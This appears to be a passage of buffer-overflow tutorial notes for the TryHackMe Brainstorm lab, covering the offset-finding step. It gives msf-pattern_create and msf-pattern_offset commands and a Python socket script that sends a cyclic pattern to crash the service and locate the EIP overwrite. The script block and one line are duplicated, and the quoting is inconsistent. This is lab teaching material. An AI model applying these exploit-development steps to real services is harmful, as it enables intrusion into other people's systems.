Finding the Offset
It is process of finding point where we can overwrite EIP
- Generate nearest number of specific strings and copy it
msf-pattern_create -l 5000
- Create python script to send the request which we done earlier manually. NOTE script can be modified according to the application. In this case we are taking BRAINSTORM tryhackme machine https://etchedshell.medium.com/try-hack-me-brainstorm-7dce55a5832
🐍
import socket, sys
username = "test"
message = “<paste the string generated in first step>”
try:
print("Sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv (1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
username = "test"
message = “<paste the string generated in first step>”
try:
print("Sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv (1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
socket.AF_INET,socket.SOCK_STREAM for IPv4,port
s.connect to connect to ip
s.recv to receive some data back
‘\r\n’ for new line or simply work as ENTER
43346943
- chmod +x script.py
- ./script.py
- Copy the 8 character value of EIP
- msf-pattern_offset -l 5000 -q <paste EIP value>
- It will give offset value or location from where EIP starts
Note
If s.send don’t work then encode the message like
➖
s.send((message + "\r\n").encode())
OR
put b before every string like b”AAAAAAA”
OR
put b before every string like b”AAAAAAA”